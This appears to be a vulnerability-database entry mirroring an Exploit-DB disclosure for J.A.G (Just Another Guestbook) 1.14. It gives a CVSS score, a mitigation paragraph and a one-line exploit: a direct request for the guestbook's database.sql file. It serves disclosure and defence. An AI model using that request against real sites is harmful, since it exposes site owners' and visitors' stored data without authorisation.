J.A.G (Just Another Guestbook) Database Disclosure Vulnerability

vendor:

J.A.G (Just Another Guestbook)

by:

Phenom

5.5

CVSS

MEDIUM

Database Disclosure

CWE

Product Name: J.A.G (Just Another Guestbook)

Affected Version From: 1.14

Affected Version To: 1.14

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

J.A.G (Just Another Guestbook) Database Disclosure Vulnerability

This vulnerability allows an attacker to disclose the database of J.A.G (Just Another Guestbook) version 1.14. By accessing the URL http://site.com/path/jag/database.sql, the attacker can retrieve the database contents.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to sensitive files and directories, and ensure that the software is up to date with the latest patches and security updates. Additionally, implementing access controls and user authentication can help prevent unauthorized access to the database.

Source

Exploit-DB raw data:

# Software Link: http://www.xs4all.nl/~crisp/jag/jag.zip
# Version: v1.14
# Tested on: Windows xp sp3
 

------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ 
| |    | | | |  __/ | | | (_) | | | | | |
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|


------------------------------------------------------

####### J.A.G (Just Another Guestbook) Database Disclosure Vulnerability #######
#
#       Author : Phenom
#
#       app version : 1.14
#
#################################################################################

####### Exploit #################################################################
#
#     http://site.com/path/jag/database.sql
#
#################################################################################